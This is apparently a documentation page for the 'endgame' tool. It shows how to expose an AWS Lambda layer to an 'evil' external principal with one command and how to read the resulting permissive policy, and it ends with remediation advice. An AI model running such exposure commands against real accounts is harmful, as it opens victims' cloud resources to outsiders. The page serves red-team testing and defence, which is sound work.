Skip to content

Lambda Layers

Steps to Reproduce

  • To expose the resource using endgame, run the following from the victim account:
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil

endgame expose --service lambda-layer --name test-resource-exposure:1
  • To view the contents of the Lambda layer policy, run the following:
export VICTIM_RESOURCE_ARN=arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure
export VERSION=3
aws lambda get-layer-version-policy \
    --layer-name $VICTIM_RESOURCE_ARN \
    --version-number $VERSION
  • Observe that the output of the overly permissive Lambda Layer Policy resembles the example shown below.

Example

Observe that the Evil principal's account ID (999988887777) is given lambda:GetLayerVersion access to the Lambda layer arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1.

{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"}]}",
    "RevisionId": ""
}

Exploitation

TODO

Remediation

  • Trusted Accounts Only: Ensure that Lambda Layers are only shared with trusted accounts.
  • Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
  • AWS Access Analyzer: Leverage AWS Access Analyzer to report on external access to Lambda Layers. See the AWS Access Analyzer documentation for more details.
  • Restrict access to IAM permissions that could lead to exposure of your Lambda Layers: Tightly control access to the following IAM actions:

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here

References